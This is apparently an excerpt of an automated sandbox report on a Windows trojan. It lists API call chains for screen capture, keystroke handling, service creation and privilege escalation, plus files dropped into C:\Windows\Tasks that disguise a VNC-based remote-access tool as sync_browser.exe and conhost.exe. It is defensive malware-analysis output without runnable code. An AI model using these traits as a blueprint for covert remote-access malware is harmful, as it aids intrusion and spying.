Code function: 19_2_00007FF74002F980 EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,ReleaseDC,DeleteDC,CreateDCA,EnumDisplaySettingsA,FreeLibrary,EnumWindows,GetDC,CreateCompatibleDC,GetLastError,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetLastError,GetDIBits,GetDIBits,GetDeviceCaps,InvalidateRect,

19_2_00007FF74002F980

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF7400231B0 GetKeyboardState,

19_2_00007FF7400231B0

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400174C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,		19_2_00007FF7400174C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400174C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,		23_2_00007FF7400174C0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF740012E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

19_2_00007FF740012E40

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF74001A130 GetVersionExA,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,OpenProcess,OpenProcessToken,CloseHandle,GetModuleFileNameA,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,OpenEventA,SetEvent,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,OpenEventA,SetEvent,GetModuleFileNameA,GetDesktopWindow,ShellExecuteA,InitializeCriticalSection,Sleep,SetThreadDesktop,CloseDesktop,

19_2_00007FF74001A130

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400134B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	19_2_00007FF7400134B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740013550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	19_2_00007FF740013550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400134B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	23_2_00007FF7400134B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740013550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	23_2_00007FF740013550

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\4735396734841324	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\B7MqI9.IYF1N0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Fgyxfc.Qnwi4I	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Ivn55G.PqhJnU	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\ndymzn.PPYh2u	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\4735396734841324.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\UltraVNC.ini	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to behavior

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00405721	0_2_00405721
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_004139D1	0_2_004139D1
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00413AAB	0_2_00413AAB
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00413370	0_2_00413370
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00413D43	0_2_00413D43
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_0040AD30	0_2_0040AD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400236D0	19_2_00007FF7400236D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001A130	19_2_00007FF74001A130
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740016930	19_2_00007FF740016930
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002D150	19_2_00007FF74002D150
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740005170	19_2_00007FF740005170
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740018980	19_2_00007FF740018980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002F980	19_2_00007FF74002F980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400081AD	19_2_00007FF7400081AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74000E1D0	19_2_00007FF74000E1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400251B7	19_2_00007FF7400251B7
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400C09F0	19_2_00007FF7400C09F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400079E9	19_2_00007FF7400079E9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740004200	19_2_00007FF740004200
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007A1C	19_2_00007FF740007A1C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740025A33	19_2_00007FF740025A33
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400B7250	19_2_00007FF7400B7250
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002623E	19_2_00007FF74002623E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740010270	19_2_00007FF740010270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007A5B	19_2_00007FF740007A5B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740028A70	19_2_00007FF740028A70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740002270	19_2_00007FF740002270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740003A90	19_2_00007FF740003A90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007A9A	19_2_00007FF740007A9A
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007ACF	19_2_00007FF740007ACF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002C2C0	19_2_00007FF74002C2C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400712C0	19_2_00007FF7400712C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007B04	19_2_00007FF740007B04
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002AB10	19_2_00007FF74002AB10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740030330	19_2_00007FF740030330
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007B37	19_2_00007FF740007B37
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007B71	19_2_00007FF740007B71
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740017B90	19_2_00007FF740017B90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740004390	19_2_00007FF740004390
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001BB80	19_2_00007FF74001BB80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007BA6	19_2_00007FF740007BA6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002739B	19_2_00007FF74002739B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001B3D0	19_2_00007FF74001B3D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740026BBD	19_2_00007FF740026BBD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740007BE2	19_2_00007FF740007BE2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400193E0	19_2_00007FF7400193E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740014C10	19_2_00007FF740014C10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400BE400	19_2_00007FF7400BE400
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002A420	19_2_00007FF74002A420
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400C2C70	19_2_00007FF7400C2C70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740033460	19_2_00007FF740033460
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400C8C90	19_2_00007FF7400C8C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400354A0	19_2_00007FF7400354A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740035CA0	19_2_00007FF740035CA0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740022CC0	19_2_00007FF740022CC0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74000DCF0	19_2_00007FF74000DCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002DCF0	19_2_00007FF74002DCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740031CE0	19_2_00007FF740031CE0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740011D10	19_2_00007FF740011D10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001AD30	19_2_00007FF74001AD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740018590	19_2_00007FF740018590
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740024D7E	19_2_00007FF740024D7E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001C5B0	19_2_00007FF74001C5B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740026DD1	19_2_00007FF740026DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740001DD0	19_2_00007FF740001DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740018E10	19_2_00007FF740018E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001E610	19_2_00007FF74001E610
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740021620	19_2_00007FF740021620
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740033E20	19_2_00007FF740033E20
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740022650	19_2_00007FF740022650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740050650	19_2_00007FF740050650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002AE70	19_2_00007FF74002AE70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740031660	19_2_00007FF740031660
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740004E80	19_2_00007FF740004E80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400C068C	19_2_00007FF7400C068C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740019740	19_2_00007FF740019740
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740003770	19_2_00007FF740003770
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001AF60	19_2_00007FF74001AF60
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400BDF80	19_2_00007FF7400BDF80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002E780	19_2_00007FF74002E780
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74000C810	19_2_00007FF74000C810
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002A870	19_2_00007FF74002A870
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740001880	19_2_00007FF740001880
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001A890	19_2_00007FF74001A890
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001C090	19_2_00007FF74001C090
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400170B0	19_2_00007FF7400170B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001C8D0	19_2_00007FF74001C8D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400120E0	19_2_00007FF7400120E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74000A910	19_2_00007FF74000A910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740011100	19_2_00007FF740011100
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001A130	23_2_00007FF74001A130
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740016930	23_2_00007FF740016930
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002D150	23_2_00007FF74002D150
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740005170	23_2_00007FF740005170
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740018980	23_2_00007FF740018980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002F980	23_2_00007FF74002F980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400081AD	23_2_00007FF7400081AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74000E1D0	23_2_00007FF74000E1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400251B7	23_2_00007FF7400251B7
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400C09F0	23_2_00007FF7400C09F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400079E9	23_2_00007FF7400079E9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740004200	23_2_00007FF740004200
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007A1C	23_2_00007FF740007A1C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740025A33	23_2_00007FF740025A33
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400B7250	23_2_00007FF7400B7250
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002623E	23_2_00007FF74002623E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740010270	23_2_00007FF740010270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007A5B	23_2_00007FF740007A5B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740028A70	23_2_00007FF740028A70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740002270	23_2_00007FF740002270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740003A90	23_2_00007FF740003A90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007A9A	23_2_00007FF740007A9A
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007ACF	23_2_00007FF740007ACF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002C2C0	23_2_00007FF74002C2C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400712C0	23_2_00007FF7400712C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007B04	23_2_00007FF740007B04
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002AB10	23_2_00007FF74002AB10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740030330	23_2_00007FF740030330
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007B37	23_2_00007FF740007B37
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007B71	23_2_00007FF740007B71
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740017B90	23_2_00007FF740017B90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740004390	23_2_00007FF740004390
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001BB80	23_2_00007FF74001BB80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007BA6	23_2_00007FF740007BA6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002739B	23_2_00007FF74002739B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001B3D0	23_2_00007FF74001B3D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740026BBD	23_2_00007FF740026BBD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740007BE2	23_2_00007FF740007BE2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400193E0	23_2_00007FF7400193E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740014C10	23_2_00007FF740014C10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400BE400	23_2_00007FF7400BE400
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002A420	23_2_00007FF74002A420
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400C2C70	23_2_00007FF7400C2C70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740033460	23_2_00007FF740033460
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400C8C90	23_2_00007FF7400C8C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400354A0	23_2_00007FF7400354A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740035CA0	23_2_00007FF740035CA0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74000DCF0	23_2_00007FF74000DCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002DCF0	23_2_00007FF74002DCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740031CE0	23_2_00007FF740031CE0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740011D10	23_2_00007FF740011D10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001AD30	23_2_00007FF74001AD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740018590	23_2_00007FF740018590
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740024D7E	23_2_00007FF740024D7E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001C5B0	23_2_00007FF74001C5B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740026DD1	23_2_00007FF740026DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740001DD0	23_2_00007FF740001DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740022DF3	23_2_00007FF740022DF3
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740018E10	23_2_00007FF740018E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001E610	23_2_00007FF74001E610
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740021620	23_2_00007FF740021620
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740033E20	23_2_00007FF740033E20
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740022650	23_2_00007FF740022650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740050650	23_2_00007FF740050650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002AE70	23_2_00007FF74002AE70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740031660	23_2_00007FF740031660
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740004E80	23_2_00007FF740004E80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400C068C	23_2_00007FF7400C068C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400236D0	23_2_00007FF7400236D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740019740	23_2_00007FF740019740
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740003770	23_2_00007FF740003770
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001AF60	23_2_00007FF74001AF60
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400BDF80	23_2_00007FF7400BDF80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002E780	23_2_00007FF74002E780
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74000C810	23_2_00007FF74000C810
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002A870	23_2_00007FF74002A870
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740001880	23_2_00007FF740001880
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001A890	23_2_00007FF74001A890
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001C090	23_2_00007FF74001C090
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400170B0	23_2_00007FF7400170B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001C8D0	23_2_00007FF74001C8D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400120E0	23_2_00007FF7400120E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74000A910	23_2_00007FF74000A910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740011100	23_2_00007FF740011100

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: String function: 004026B0 appears 38 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7400B70B4 appears 56 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7400B9500 appears 42 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF74006A3B0 appears 38 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF740003730 appears 730 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7400B7C50 appears 60 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF74000AE30 appears 34 times

Source: Fgyxfc.Qnwi4I.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Fgyxfc.Qnwi4I.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Fgyxfc.Qnwi4I.2.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Fgyxfc.Qnwi4I.2.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: sync_browser.exe.6.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: sync_browser.exe.6.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: mSRW5AfJpC.exe, 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebrowser.exe( vs mSRW5AfJpC.exe
Source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCONHOST.EXEj% vs mSRW5AfJpC.exe
Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs mSRW5AfJpC.exe
Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs mSRW5AfJpC.exe
Source: mSRW5AfJpC.exe, 00000000.00000003.2112022833.0000000002565000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebrowser.exe( vs mSRW5AfJpC.exe
Source: mSRW5AfJpC.exe	Binary or memory string: OriginalFilenamebrowser.exe( vs mSRW5AfJpC.exe

Source: mSRW5AfJpC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Ivn55G.PqhJnU.0.dr

Binary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp

Source: classification engine

Classification label: mal84.troj.spyw.evad.winEXE@56/60@2/1

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00408DBF

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400134B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	19_2_00007FF7400134B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740013550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	19_2_00007FF740013550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400118A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	19_2_00007FF7400118A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400134B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	23_2_00007FF7400134B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740013550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	23_2_00007FF740013550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400118A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	23_2_00007FF7400118A0

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,

0_2_004011D1

Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		19_2_00007FF740012D00
Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		23_2_00007FF740012D00

Source: C:\Windows\Tasks\sync_browser.exe

